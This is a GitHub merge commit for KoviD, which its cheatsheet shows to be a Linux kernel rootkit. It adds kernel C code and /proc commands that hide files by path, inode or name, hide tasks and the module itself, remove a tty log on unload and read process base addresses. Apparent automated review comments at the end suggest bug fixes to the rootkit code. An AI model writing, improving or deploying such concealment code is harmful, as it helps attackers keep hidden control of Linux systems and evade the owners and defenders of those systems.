Merge pull request #110 from carloslack/kvdev
Kvdev
carloslack authored Oct 2, 2024
2 parents 61daa7f + ebc05c9 commit 08ec90f
Showing 3 changed files with 59 additions and 46 deletions.
26 changes: 17 additions & 9 deletions docs/cheatsheet-proc-interface.txt
Expand Up @@ -33,30 +33,38 @@
$ echo "-s" >/proc/test
$ dmesg

#11 Hide README.txt by inode number from current directory
$ echo "-a AAA `stat -c %i README.txt`" >/proc/test
#11 Hide README.txt
# At current directory only
$ echo "-a README.txt" >/proc/test
# At full-path
$ echo "-a /home/files/README.txt" >/proc/test

#12 Hide ALL files named README.txt - this bypass #11
#11 Hide README.txt globally - hide all instances of README.txt
# bypass #10 and #11
$ echo "-g README.txt" >/proc/test


#13 Hide ALL files named README.txt - this bypass #11
$ echo "-a README.txt" >/proc/test

#13 Undo #12 - this bypass #11
#14 Undo #12 - this bypass #11
$ echo "-d README.txt" >/proc/test

#14 List hidden tasks - debug mode only
#15 List hidden tasks - debug mode only
$ echo "-s" >/proc/test
$ dmesg

#14 List hidden files and directories - debug mode only
#16 List hidden files and directories - debug mode only
$ echo "-l" >/proc/test
$ dmesg

#15 Mark tty log file to be removed when KoviD is rmmod'ed
#17 Mark tty log file to be removed when KoviD is rmmod'ed
$ echo "-t0" >/proc/test

#16 Undo #15
#18 Undo #15
$ echo "-t1" >/proc/test

#17 Fetch the base address of a running process by PID number
#19 Fetch the base address of a running process by PID number
$ echo "-b <PID>">/proc/kv
$ cat /proc/kv

53 changes: 29 additions & 24 deletions src/kovid.c
Expand Up @@ -22,6 +22,7 @@
#include <linux/tcp.h>
#include <linux/kthread.h>
#include <linux/kernel.h>
#include <linux/namei.h>

#include "lkm.h"
#include "fs.h"
Expand Down Expand Up @@ -476,7 +477,7 @@ static ssize_t write_cb(struct file *fptr, const char __user *user,
} else {
kv_hide_task_by_pid(val, 1, CHILDREN);
}
/* hide kovid module */
/* hide kovid module */
} else if(!strcmp(buf, "-h") && !op_lock) {
static unsigned int msg_lock = 0;
if(!msg_lock) {
Expand All @@ -490,33 +491,37 @@ static ssize_t write_cb(struct file *fptr, const char __user *user,
/* list hidden tasks */
} else if(!strcmp(buf, "-s")) {
kv_show_saved_tasks();
/* add name to the list of hidden files/directories
* and inode, is present.
* */
/* hide file/directory based on inode */
} else if(!strncmp(buf, "-a", MIN(2, size))) {
int ino = 0;
char *s = &buf[3];
char *number_str;
const char *tmp[] = {NULL, NULL};
int ok = 1;

s[strcspn(s, "\n")] = 0;

// Find the first space in the input to separate name and number
number_str = strchr(s, ' ');
if (number_str) {
*number_str++ = '\0';
} else {
number_str = "";
struct kstat stat;
struct path path;

if (!kern_path(s, LOOKUP_FOLLOW, &path)) {
if (!vfs_getattr(&path, &stat, STATX_BASIC_STATS, AT_STATX_SYNC_AS_STAT)) {
if (*s != '/') {
/** It is a full path */
tmp[0] = s;
fs_add_name_rw(tmp, stat.ino);
} else {
/** It is filename, no problem because we have path.dentry */
const char *f = kstrdup(path.dentry->d_name.name, GFP_KERNEL);
path_put(&path);
tmp[0] = f;
fs_add_name_rw(tmp, stat.ino);
kv_mem_free(&f);
}
}
}
/* hide file/directory globally */
} else if(!strncmp(buf, "-g", MIN(2, size))) {
char *s = &buf[3];
s[strcspn(s, " ")] = 0;
if (strlen(s)) {
const char *tmp[] = {s,NULL};
fs_add_name_rw(tmp, 0);
}

*tmp = s;
if (*number_str)
ok = !kstrtoint(number_str, 10, &ino);

if (ok)
fs_add_name_rw(tmp, ino);
/* unhide file/directory */
} else if(!strncmp(buf, "-d", MIN(2, size))) {
char *s = &buf[3];
s[strcspn(s, " ")] = 0;
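Review bot: The two comments in the new `-a` branch are swapped relative to their conditions: `if (*s != '/')` is the case where the input is a bare or relative name, and the `else` arm is the absolute-path case that stores `path.dentry->d_name.name`, so they should read `/* relative name: store it as given */` and `/* absolute path: store only the final component */`. In the same branch `path_put(&path)` is called only in the `else` arm, so the reference taken by a successful `kern_path()` stays held when the name is relative or when `vfs_getattr()` fails; a single `path_put(&path);` placed after the `vfs_getattr()` block would release it on every path. The `kstrdup()` result is also handed to `fs_add_name_rw()` without a NULL check. `write_cb` starts and ends outside this hunk.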
26 changes: 13 additions & 13 deletions src/lkm.h
Expand Up @@ -25,19 +25,19 @@
#define prerr_once(fmt, ...) pr_err_once(fmt, ##__VA_ARGS__);

#else
#define prinfo(fmt, ...)
#define prwarn(fmt, ...)
#define premerg(fmt, ...)
#define pralert(fmt, ...)
#define prcrit(fmt, ...)
#define prnotice(fmt, ...)
#define prerr(fmt, ...)
#define prwarn_ratelimited(fmt, ...);
#define prinfo_ratelimited(fmt, ...);
#define prerr_ratelimited(fmt, ...);
#define prinfo_once(fmt, ...);
#define prwarn_once(fmt, ...);
#define prerr_once(fmt, ...);
#define prinfo(fmt, ...) do {} while (0)
#define prwarn(fmt, ...) do {} while (0)
#define premerg(fmt, ...) do {} while (0)
#define pralert(fmt, ...) do {} while (0)
#define prcrit(fmt, ...) do {} while (0)
#define prnotice(fmt, ...) do {} while (0)
#define prerr(fmt, ...) do {} while (0)
#define prwarn_ratelimited(fmt, ...) do {} while (0)
#define prinfo_ratelimited(fmt, ...) do {} while (0)
#define prerr_ratelimited(fmt, ...) do {} while (0)
#define prinfo_once(fmt, ...) do {} while (0)
#define prwarn_once(fmt, ...) do {} while (0)
#define prerr_once(fmt, ...) do {} while (0)
#endif

#define EXIT_UNHIDE 1
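Review bot: The debug-build definition visible just above the `#else` still ends in a semicolon (`#define prerr_once(fmt, ...) pr_err_once(fmt, ##__VA_ARGS__);`), so the two build modes now expand differently: an unbraced `if (x) prerr_once("..."); else ...` compiles with the new `do {} while (0)` stubs but not with the debug macro. Dropping the trailing `;` there, as in `#define prerr_once(fmt, ...) pr_err_once(fmt, ##__VA_ARGS__)`, would make both branches behave as a single statement. Only the last debug macro falls inside this hunk, so the earlier ones are presumably written the same way and should be checked.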